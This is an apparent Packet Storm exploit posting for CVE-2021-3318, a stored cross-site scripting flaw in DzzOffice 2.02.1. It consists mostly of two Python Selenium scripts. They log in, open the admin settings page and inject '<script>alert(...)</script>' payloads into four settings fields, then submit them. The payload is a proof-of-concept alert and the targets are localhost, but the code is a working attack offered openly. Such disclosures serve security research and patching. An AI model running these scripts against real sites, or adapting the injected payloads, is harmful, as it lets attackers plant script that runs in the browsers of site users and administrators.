Lucene search

K
packetstormNu11secur1tyPACKETSTORM:162314
HistoryApr 23, 2021 - 12:00 a.m.

DzzOffice 2.02.1 Cross Site Scripting

2021-04-2300:00:00
nu11secur1ty
packetstormsecurity.com
207
`# Exploit Title: XSS attack (app/setting) in DzzOffice-2.02.1  
# Author: @nu11secur1ty  
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r  
# Date: 04.23.2021  
# Vendor: http://www.dzzoffice.com/  
# Link: https://github.com/zyx0814/dzzoffice  
# CVE: CVE-2021-3318  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# CVE-2021-3318  
  
from selenium import webdriver  
import time  
import os  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/dzzoffice/user.php?mod=login"  
  
#enter your login username  
username="[email protected]"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="email"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="loginsubmit"  
  
# Dai brauzura aaa ta eba  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
  
# Otvarai da ne vlazam s kasata  
browser.get((website_link))  
  
# Run...  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
  
### Login  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
### Exploit  
#time.sleep(3)  
element_for_natrutvanie="admin_password"  
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"  
browser.get((laina))  
  
### Next level... :)  
os.system("python poc_login_1.py")  
  
print("payload is deployed_0...\n")  
except Exception:  
  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
### os.system  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# CVE-2021-3318  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/dzzoffice/admin.php?mod=setting"  
  
#enter your login username  
username="[email protected]"  
  
#enter your login password  
password="password"  
  
  
#enter the element for username input field  
element_for_username="admin_email"  
  
#enter the element for password input field  
element_for_password="admin_password"  
  
#enter the element for submit button  
element_for_submit="submit"  
  
# Dai brauzura aaa ta eba  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
  
# Otvarai da ne vlazam s kasata  
browser.get((website_link))  
  
# Run...  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
  
### Login  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
### Exploit  
time.sleep(3)  
element_for_natrutvanie="settingsubmit"  
laina="http://localhost/dzzoffice/admin.php?mod=setting"  
browser.get((laina))  
  
### Inner text...  
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value  
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")  
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value  
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")  
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value  
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")  
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value  
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")  
  
time.sleep(5)  
  
# Submit exploit  
signInButton = browser.find_element_by_name(element_for_natrutvanie)  
signInButton.click()  
  
print("payload is deployed_1...\n")  
except Exception:  
  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
---------------------------------  
  
# Exploit Title: XSS attack (app/setting) in DzzOffice-2.02.1  
# Date: 04.23.2021  
# Exploit Authotr idea: @nu11secur1ty  
# Exploit Debugging: @nu11secur1ty, g3ck0dr1v3r  
# Vendor Homepage: http://www.dzzoffice.com/  
# Software Link: https://github.com/zyx0814/dzzoffice  
  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3318  
`
Related for PACKETSTORM:162314